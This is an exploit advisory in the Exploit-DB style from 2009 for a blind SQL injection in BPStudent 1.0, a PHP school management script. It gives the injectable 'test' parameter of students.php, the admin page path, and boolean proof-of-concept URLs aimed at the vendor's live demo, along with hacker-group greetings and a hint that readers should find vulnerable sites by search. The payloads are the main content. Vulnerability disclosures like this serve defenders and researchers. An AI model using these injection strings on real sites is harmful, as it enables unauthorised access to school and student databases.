BPStudent 1.0 - Blind SQL Injection

EDB-ID:

9837

CVE:

N/A

Author:

OoN Boy

Type:

webapps

Platform:

PHP

Published:

2009-09-22

[x]========================================================================================================================================[x]
 |                                                      AntiSecurity[dot]org                                                                |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Title    		: BPStudent 1.0 blind SQL Vulnerabilities									    |
 | Software 		: BPStudent													    |
 | Vendor   		: http://bpowerhouse.info											    |
 | Date    		: 22 September 2009 ( Indonesia )										    |
 | Author   		: OoN_Boy													    |
 | Contact  		: oon.boy9@gmail.com												    |
 | Web	    		: http://oonboy.info												    |
 | Blog     		: http://oonboy.blogspot.com											    |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Technology		: PHP5                                                                                                              |
 | Database		: MySQL                                                                                                             |
 | Version		: 1.0                                                                                                               |
 | License		: GNU GPL                                                                                                           |
 | Price		: $27.90                                                                                                            |
 | Description		: This script is a  on site school script, students can register, download study material and take exams- system    |
 |			  will mark the exams and student can graduate courses, administrator can create exams, manage students and courses |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Google Dork 		: cari sendiri yah :)												    |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Exploit 		: http://localhost/[path]/students.php?page=preview&test=[sql]			 	 			    |
 | Aadmin Page		: http://localhost/[path]/admin/index.php									    |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Proof of concept	: http://bpowerhouse.com/demos/bpstudentsDemo/students.php?page=preview&test=1+and+substring(@@version,1,1)=5 True  |
 |			  http://bpowerhouse.com/demos/bpstudentsDemo/students.php?page=preview&test=1+and+substring(@@version,1,1)=4 False |
 | 			: Mesti login untuk mencoba exploitnya :)									    |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Greetz		: antisecurity.org batamhacker.or.id                                                                                |
 |		 	  Vrs-hCk NoGe Paman zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va                       |
 | 		  	  k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere                  |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Note			: Selamat hariraya idul fitri mohon maaf lahir dan batin, maafin kesalahan ku selama ini yah all :)		    |
 |			  kabur.... untuk sementara waktu.... bye bye.....								    |
[x]========================================================================================================================================[x]